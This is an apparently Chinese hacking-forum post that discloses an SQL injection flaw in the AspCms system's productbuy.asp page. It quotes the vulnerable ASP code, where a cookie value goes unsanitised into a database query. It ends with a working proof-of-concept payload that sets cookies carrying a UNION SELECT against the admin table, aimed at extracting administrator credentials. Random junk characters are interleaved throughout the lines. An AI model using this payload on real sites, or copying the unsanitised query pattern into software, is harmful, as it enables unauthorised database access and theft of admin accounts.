好久没上土司了,上来一看发现在删号名单内.....$ d, J* V& H: N( t- s7 a h
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。; h9 o2 y: A P/ x3 v
废话不多说,看代码:# W& v$ {: q$ h; z& O1 V
- x) W( [ t5 V1 \; M* o' f- K
<%( ~5 Z* k" E* ~ s! \
8 _: O: I; \; {3 M
if action = "buy" then
# C: g9 ` |$ [3 j/ V3 @- V- | p& B3 z' e- ^- d# w* d
addOrder()
2 `( d4 P$ v7 C; ?) I! z' G; v% |
0 G2 T8 J) X, E3 I, _% x" g+ N+ lelse
3 _+ ]7 y2 K9 {- C# {* O& u
, I+ ]% U6 r( @" ]$ e echoContent()+ ~( ^8 g z( l9 m% S& \
0 S0 v6 X: F( u; S4 I7 }" ^. w
end if, f; q; g; D4 g. u& \& ^
- H. v2 \8 W. Q% r/ H9 [
8 Y& s. z* B# J3 J8 P2 J4 C j3 Z8 @3 `
……略过
5 L$ }& {% p6 G/ S/ k7 o6 C0 w# r# u3 Z8 Z( }6 W' ^% Q% P+ _
- w4 w" V8 k9 k. l' q7 J* l' s0 b" d2 S5 I4 W5 f7 F
Sub echoContent()
2 e3 o! _# L ~; k) D; z* T; }+ t
dim id
6 a( d; t3 G8 g3 O* ?4 u% Z* v
3 Q/ H: a: H ^) j1 | id=getForm("id","get")0 N5 x$ g& w0 _5 |9 |2 t/ Z* q$ E
7 `' N- X0 S1 G3 Y3 y2 t. {) U l2 L
( z8 |2 B# X: _- J9 Z+ x/ h
1 v* }, c) [6 r1 z8 P2 y' g, d6 Z if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" , L/ d- h2 u4 v0 J: u. G
& L; c) K6 N/ O1 D
# u* g. i& X7 r3 t
, }( y& o1 t$ N" l6 ^. h
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
# j* }3 m* g0 \( c5 e2 `6 y2 n; U, W2 \
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct; ~) p& v. T7 O/ G
3 K; I3 Z6 K2 z6 |2 ? Dim templatePath,tempStr; j; E" b' g" _! L& }
# X, C0 m" J/ z4 y3 Z templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"; I4 A0 O6 ^! x5 [+ p7 c2 e: t' M
, R) A+ G7 U7 Q4 w( ?, }
( G) U/ r6 F" W, A6 v) o" c( W8 s
8 ]( f5 w# k3 f; q" C7 @ set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
7 t4 L' l) @( R" g
! x4 j; E' `$ V$ q selectproduct=rsObj(0)
+ R3 Q( |% F/ G- D3 }& j0 W6 f$ b2 S/ G; S5 E V5 {; T% P
. O9 Y+ v$ }) C6 ~: Y
" ~" N% s- j5 f3 Q. n Dim linkman,gender,phone,mobile,email,qq,address,postcode
7 h( O5 @* ?! n, b
: q! _6 x# P& `! E7 {" N* I if isnul(rCookie("loginstatus")) then wCookie"loginstatus",01 u" N3 L6 a" A7 N; B `7 I
6 I; v4 x& i7 V6 u$ X if rCookie("loginstatus")=1 then 5 l" u8 l% u9 _% H, \% |' D5 u
7 @* ?# y3 b1 x" k0 x$ E- g set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")# _" `* z+ U# ]% |7 ~% V7 e
: J2 A) a# s, h5 l9 @ linkman=rsObj("truename"); n8 `* M4 g, F
; V7 v, g1 z% C" P gender=rsObj("gender")
! b, J: Q/ I4 o# ?
v: x* r- A8 x( X! f4 ] phone=rsObj("phone")
. b" e# r; D+ k4 Z3 |2 C2 [1 g0 g% p7 S: U( j
mobile=rsObj("mobile")8 R, N$ k% G' s9 b
' x0 R; f1 E. B+ P3 k. f. j2 ?; f( m
email=rsObj("email")
! w& C0 Z6 F* y; e8 G
: i0 ?; M+ h& i6 |1 W qq=rsObj("qq")$ @6 J/ _1 I. m) H" |! o
, a. n. x) K# O! o! z) ^% c
address=rsObj("address")" m' b) n ]* h# j6 S G% u+ d8 x
2 E. }* N$ N J s% `* \- q
postcode=rsObj("postcode")
: D! N- z) j \. Y
. f* U: g- [- Z" x+ j7 _9 @ else & a# X9 P8 C/ ?8 g/ j* e8 J% `
- o- e4 @% g7 h% i; t
gender=1, r( j* }8 a( T! G7 u% R6 Z
2 K7 ?, N: U- h end if, |. j4 l6 x: _% Q
2 }) S& J4 \. }: \( y
rsObj.close()3 a# @" o& ?5 \9 Z' M
* w+ f; z4 n! D C" c+ @& Y' n" O. a1 i U
5 n3 n3 ~$ _! s+ e/ {& S with templateObj
+ @2 b6 x V7 E( U# x3 G3 ?& G" |+ y4 E6 W R! G6 f0 t! v4 S
.content=loadFile(templatePath)
6 G! C( l$ A F% a" R9 O; w
& b: C. M- Q1 u .parseHtml()' v8 O2 L3 Y% g
9 t# k" P V# C .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
: m8 k- D5 P" Y# i: {: ~
0 ]3 N! b/ |! E6 J7 I; U! E! y .content=replaceStr(.content,"[aspcms:linkman]",linkman)
% e! ^$ K B. z6 }( c K, K0 _. ]' b \) d6 J
.content=replaceStr(.content,"[aspcms:gender]",gender) 0 |7 r' f. e4 \) Q
( {' S' W0 ]' T: G8 I1 _! t- }2 c( N .content=replaceStr(.content,"[aspcms:phone]",phone) l1 P1 y& z( y4 o% Y5 K" i, W
: ~6 I' y* B) k+ Z0 x# L J# R `
.content=replaceStr(.content,"[aspcms:mobile]",mobile) ) U" C0 i7 X* F6 i, R8 U( p+ {
' O5 M# b: [+ ?+ } i" y) o .content=replaceStr(.content,"[aspcms:email]",email) 0 G1 _+ S2 p |& F, G0 g
% ]8 y/ o+ v+ M* { .content=replaceStr(.content,"[aspcms:qq]",qq) & a" }1 Q9 I. O
9 m4 S, P/ r# ?; w7 n0 [" ?6 j .content=replaceStr(.content,"[aspcms:address]",address) + P. V2 o* ^- h5 K3 K- D
* `! F# B2 O1 X; C- s( D .content=replaceStr(.content,"[aspcms:postcode]",postcode) ! z( ~) Y- |, {0 Y4 H5 S
. v2 q( u0 l4 s% C1 W3 \
.parseCommon()
4 ^7 z0 w; G9 @: G9 C$ H; x7 J+ c9 Z
# |. O; H8 c3 I1 l2 V1 J echo .content
# Y, M8 [' u; {3 l6 s8 w" x8 j$ {& z2 \
end with
8 n. \" y- e3 b& I
* ^* E0 a. g1 t set templateobj =nothing : terminateAllObjects, }% L; W3 ]0 A5 P& y4 w
; V7 G% E" ?& H! @& k" b3 W
End Sub* T) d6 V E% O0 ]
漏洞很明显,没啥好说的
0 L5 u. p8 K$ bpoc:% z% c1 i' ?( X* d
) c8 F8 n! [8 \) e) g
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子% r. q+ E# h! C, ?' @# }! V+ N4 L
# ?; F- I( K5 P7 l$ Z0 ~
|
发表于 2012-12-27 08:35:05
收藏
支持
反对